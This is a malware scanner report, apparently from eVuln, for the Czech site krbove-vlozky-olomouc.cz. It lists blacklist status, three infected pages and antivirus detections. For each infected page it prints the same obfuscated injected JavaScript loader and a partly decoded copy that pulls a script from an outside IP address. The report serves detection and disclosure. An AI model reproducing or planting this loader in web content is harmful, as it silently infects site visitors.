New scan:

Malware Scanner report for krbove-vlozky-olomouc.cz

Malicious/Suspicious/Total urls checked
3/0/4
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "krbove-vlozky-olomouc.cz" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=krbove-vlozky-olomouc.cz

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.krbove-vlozky-olomouc.cz/
200 OK
Content-Length: 26429
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%2631%264E%2631iuuq%264B00kbwbufsn/dpn0pof/kt%2631%264F%264D0tdsjqu%264F1')

Decoded script:

...[117 bytes skipped]...
><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
var head=document.getElementsByTagName('head')[0]
var script=document.createElement('script')
script.setAttribute('type', 'text/javascript')
script.setAttribute('src', "http://91.239.15.61/google.js")
head.appendChild(script)
}
}
function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;
...[389 bytes skipped]...

Antivirus reports:

nProtect
JS:Trojan.Crypt.KA
F-Secure
JS:Trojan.Crypt.KA
Norman
Inor.A
GData
JS:Trojan.Crypt.KA
BitDefender
JS:Trojan.Crypt.KA

http://www.krbove-vlozky-olomouc.cz/krbove-vlozky-s-vymenikem/
200 OK
Content-Length: 15901
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%2631%264E%2631iuuq%264B00kbwbufsn/dpn0pof/kt%2631%264F%264D0tdsjqu%264F1')

Decoded script:

...[117 bytes skipped]...
><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
var head=document.getElementsByTagName('head')[0]
var script=document.createElement('script')
script.setAttribute('type', 'text/javascript')
script.setAttribute('src', "http://91.239.15.61/google.js")
head.appendChild(script)
}
}
function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;
...[389 bytes skipped]...

Antivirus reports:

nProtect
JS:Trojan.Crypt.KA
F-Secure
JS:Trojan.Crypt.KA
Norman
Inor.A
GData
JS:Trojan.Crypt.KA
BitDefender
JS:Trojan.Crypt.KA

http://www.krbove-vlozky-olomouc.cz/kontaktni-informace/
200 OK
Content-Length: 20574
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%2631%264E%2631iuuq%264B00kbwbufsn/dpn0pof/kt%2631%264F%264D0tdsjqu%264F1')

Decoded script:

...[117 bytes skipped]...
><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
var head=document.getElementsByTagName('head')[0]
var script=document.createElement('script')
script.setAttribute('type', 'text/javascript')
script.setAttribute('src', "http://91.239.15.61/google.js")
head.appendChild(script)
}
}
function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;
...[389 bytes skipped]...

Antivirus reports:

nProtect
JS:Trojan.Crypt.KA
F-Secure
JS:Trojan.Crypt.KA
Norman
Inor.A
GData
JS:Trojan.Crypt.KA
BitDefender
JS:Trojan.Crypt.KA

http://www.krbove-vlozky-olomouc.cz/test404page.js
404 Not Found
Content-Length: 4140
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: krbove-vlozky-olomouc.cz

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: krbove-vlozky-olomouc.cz
Referer: http://www.google.com/search?q=krbove-vlozky-olomouc.cz

Result:
The result is similar to the first query. There are no suspicious redirects found.